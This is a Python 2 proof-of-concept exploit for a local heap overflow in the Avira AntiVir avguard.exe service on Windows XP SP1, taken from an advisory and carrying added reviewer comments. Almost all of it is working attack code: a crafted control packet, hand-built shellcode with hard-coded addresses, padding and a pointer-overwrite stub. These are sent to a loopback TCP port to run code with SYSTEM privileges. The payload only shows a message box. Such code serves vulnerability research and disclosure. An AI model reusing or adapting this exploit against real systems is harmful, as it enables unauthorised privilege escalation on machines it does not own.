source: https://www.securityfocus.com/bid/45807/info Avira AntiVir Personal is prone to multiple code-execution vulnerabilities. Successful exploits may allow an attacker to execute arbitrary code with SYSTEM-level privileges. Failed exploit attempts will likely result in denial-of-service conditions. Please note that these issues affect versions of the application that are no longer supported.
#
# Avira AntiVir personal edition avguard.exe 7.00.00.52 local heap overflow
# Proof of Concept (PoC) exploit / target: WinXP SP1
# bug discovered/exploit written by D.Elser
#
# by sending two simple TCP packets which will
# exploit a vulnerability in the Antivir guard
# service, the user will gain SYSTEM privileges
#
# this PoC code will cause the avguard service
# to show a messagebox within an infinite loop
#
# NOTE(review): this is Python 2 code -- it uses the `print` statement and
# relies on "\x.." literals being byte strings.  Under Python 3 the `print`
# lines are a SyntaxError and sendall() would reject str payloads.
#
# Defensive context: the vulnerable guard service accepts these two packets
# on a local TCP port (18350 on the loopback interface, see below), so any
# local user can reach it.  The remedy per the advisory text above is moving
# off the affected, no-longer-supported versions.

from socket import *
import sys

# the first packet which is sent must
# contain a magic ID at offset 0x18
# and the length of the second packet
# to receive
#
# offset 0x18 : magic ID
# offset 0x1C : length of buffer for second packet
#
# 32-byte control packet: 24 zero bytes, then the author's "magic ID"
# (bytes 00 00 31 06 at 0x18) and the length field (bytes 00 00 00 40 at
# 0x1C).  The byte order the service applies to that field is not shown
# here, so whether it reads as 0x40 or 0x40000000 is unconfirmed -- TODO.
# Presumably the mismatch between this advertised length and the
# 0x4008-byte second packet built below is what triggers the overflow.
cpacket = "\x00\x00\x00\x00" \
          "\x00\x00\x00\x00" \
          "\x00\x00\x00\x00" \
          "\x00\x00\x00\x00" \
          "\x00\x00\x00\x00" \
          "\x00\x00\x00\x00" \
          "\x00\x00\x31\x06" \
          "\x00\x00\x00\x40"

# NUL-terminated ASCII text (song lyrics, "Breakbeat Era - Bullitproof"
# once decoded) appended to the payload after the message string below;
# it is plain text, not code.
lyrics = "\x42\x72\x65\x61\x6B\x62\x65\x61\x74\x20\x45\x72\x61\x20\x2D\x20" \
         "\x42\x75\x6C\x6C\x69\x74\x70\x72\x6F\x6F\x66\x0D\x0A\x0D\x0A\x45" \
         "\x6C\x65\x63\x74\x72\x69\x66\x79\x20\x6D\x65\x20\x79\x6F\x75\x20" \
         "\x6D\x79\x20\x68\x61\x6C\x66\x20\x62\x61\x6B\x65\x64\x20\x79\x6F" \
         "\x75\x74\x68\x0D\x0A\x49\x20\x6D\x65\x6D\x6F\x72\x69\x73\x65\x20" \
         "\x79\x6F\x75\x72\x20\x66\x61\x63\x65\x20\x73\x6F\x20\x49\x20\x77" \
         "\x6F\x6E\x27\x74\x20\x66\x6F\x72\x67\x65\x74\x20\x79\x6F\x75\x0D" \
         "\x0A\x44\x61\x6E\x63\x69\x6E\x67\x20\x64\x65\x6D\x6F\x6E\x73\x20" \
         "\x69\x6E\x20\x74\x68\x65\x20\x66\x69\x72\x65\x6C\x69\x67\x68\x74" \
         "\x20\x79\x65\x73\x20\x69\x74\x27\x73\x20\x74\x72\x75\x65\x0D\x0A" \
         "\x52\x65\x6D\x69\x6E\x64\x20\x6D\x65\x20\x6F\x66\x20\x74\x68\x65" \
         "\x20\x6E\x69\x67\x68\x74\x20\x49\x20\x66\x69\x72\x73\x74\x20\x6D" \
         "\x65\x74\x20\x79\x6F\x75\x0D\x0A\x43\x72\x69\x74\x69\x63\x69\x73" \
         "\x65\x20\x6D\x65\x20\x66\x6F\x72\x20\x6D\x79\x20\x6D\x69\x73\x2D" \
         "\x73\x70\x65\x6E\x74\x20\x79\x6F\x75\x74\x68\x0D\x0A\x4E\x6F\x20" \
         "\x74\x68\x72\x69\x6C\x6C\x20\x6E\x6F\x20\x6C\x69\x65\x20\x6D\x6F" \
         "\x72\x65\x20\x63\x72\x61\x7A\x79\x20\x74\x68\x61\x6E\x20\x74\x68" \
         "\x65\x20\x74\x72\x75\x74\x68\x0D\x0A\x59\x6F\x75\x20\x67\x69\x76" \
         "\x65\x20\x6D\x65\x20\x70\x72\x65\x63\x69\x6F\x75\x73\x20\x74\x68" \
         "\x69\x6E\x67\x73\x20\x49\x20\x74\x68\x72\x6F\x77\x20\x74\x68\x65" \
         "\x6D\x20\x61\x6C\x6C\x20\x61\x77\x61\x79\x0D\x0A\x41\x6E\x64\x20" \
         "\x6E\x6F\x77\x20\x79\x6F\x75\x20\x66\x72\x65\x65\x20\x6D\x79\x20" \
         "\x62\x72\x65\x61\x74\x68\x20\x79\x6F\x75\x72\x20\x73\x63\x61\x72" \
         "\x65\x64\x20\x77\x68\x61\x74\x20\x49\x20\x6D\x69\x67\x68\x74\x20" \
         "\x73\x61\x79\x0D\x0A\x0D\x0A\x53\x70\x65\x61\x6B\x20\x6E\x6F\x20" \
         "\x6C\x69\x65\x2C\x20\x49\x20\x74\x65\x6C\x6C\x20\x74\x68\x65\x20" \
         "\x74\x72\x75\x74\x68\x0D\x0A\x53\x61\x76\x65\x20\x6D\x79\x20\x62" \
         "\x72\x65\x61\x74\x68\x20\x79\x6F\x75\x20\x62\x72\x65\x61\x6B\x20" \
         "\x74\x68\x65\x20\x72\x75\x6C\x65\x73\x0D\x0A\x54\x69\x6D\x65\x20" \
         "\x77\x69\x6C\x6C\x20\x74\x65\x6C\x6C\x20\x79\x65\x61\x68\x20\x77" \
         "\x68\x6F\x20\x69\x73\x20\x77\x68\x6F\x0D\x0A\x53\x69\x64\x65\x20" \
         "\x62\x79\x20\x73\x69\x64\x65\x20\x77\x65\x27\x72\x65\x20\x62\x75" \
         "\x6C\x6C\x69\x74\x70\x72\x6F\x6F\x66\x00"

# main part of shellcode
#
# 31 bytes of machine code, then the NUL-terminated message string, then the
# lyrics.  The code appears to be a small x86 stub that calls a fixed
# absolute address (the 0x0042712f operand) and jumps back to its own start,
# which matches the author's "messagebox within an infinite loop" note.
# Hard-coded absolute addresses like this are why the PoC is pinned to
# avguard.exe 7.00.00.52 on XP SP1; any other build or OS would differ.
shellcode = "\x90\x8d\x46\x1b" \
            "\x50\x05\x04\x00" \
            "\x00\x00\x50\x05" \
            "\x19\x00\x00\x00" \
            "\x50\xb8\x2f\x71" \
            "\x42\x00\xff\xd0" \
            "\x90\xeb\xe5\x10" \
            "\x20\x01\x00" \
            "I got SYSTEM privileges!\x00" + lyrics

# fill shellcode up to a specific length
#
# Pads with 0x40 ('@') one byte at a time until the buffer is exactly
# 0x4000 - 0x20 = 16352 bytes (range() is empty, i.e. no padding, if the
# buffer were already longer).  Byte-wise str concatenation is quadratic
# but immaterial at this size.
for i in range(0, 0x4000 - 0x20 - len(shellcode)):
    shellcode = shellcode + "\x40"

# second part of shellcode which contains
# the pointers to be overwritten and code
# which jumps to main part of our shellcode
#
# 40 more bytes, bringing the second packet to 0x4008 bytes in total.
# The trailing backslash after the last literal is in the original; it
# joins an empty line and the statement is already complete, so it is
# harmless.
shellcode = shellcode + "\xEB\x0E\x90\x90" \
                        "\x90\x90\x90\x90" \
                        "\x52\xBF\x04\x78" \
                        "\xB4\x73\xED\x77" \
                        "\x8B\x57\x6C\x8B" \
                        "\xF2\x81\xEE\xE0" \
                        "\x3F\x00\x00\xFF" \
                        "\xE6\x90\x90\x90" \
                        "\x90\x90\x90\x90" \
                        "\x90\x90\x90\x90" \

# Connect to the guard service on the loopback interface, TCP port 18350.
# settimeout(1) bounds connect/sendall/recv; recv() below raises
# socket.timeout if the service sends nothing within a second.  The socket
# is never closed explicitly -- the process simply exits.
s = socket(AF_INET,SOCK_STREAM)
s.settimeout(1)
s.connect(("127.0.0.1",18350))

print "Avira Antivir avguard.exe 7.00.00.52 local heap overflow.\n" \
      "Exploit compatible with XP SP1.\n"

# 32-byte control packet first (size printed in hex: 0x20).
print "Sending control packet (size: 0x%x)" % (len(cpacket))
s.sendall(cpacket)

# Then the 0x4008-byte payload the control packet "announced".
print "Sending shellcode packet (size: 0x%x)" % (len(shellcode))
s.sendall(shellcode)

# Whatever the service answers (up to 1 KB) is echoed raw; on a timeout
# this raises instead of printing.
print "avguard response:"
print s.recv(1024)

sys.exit()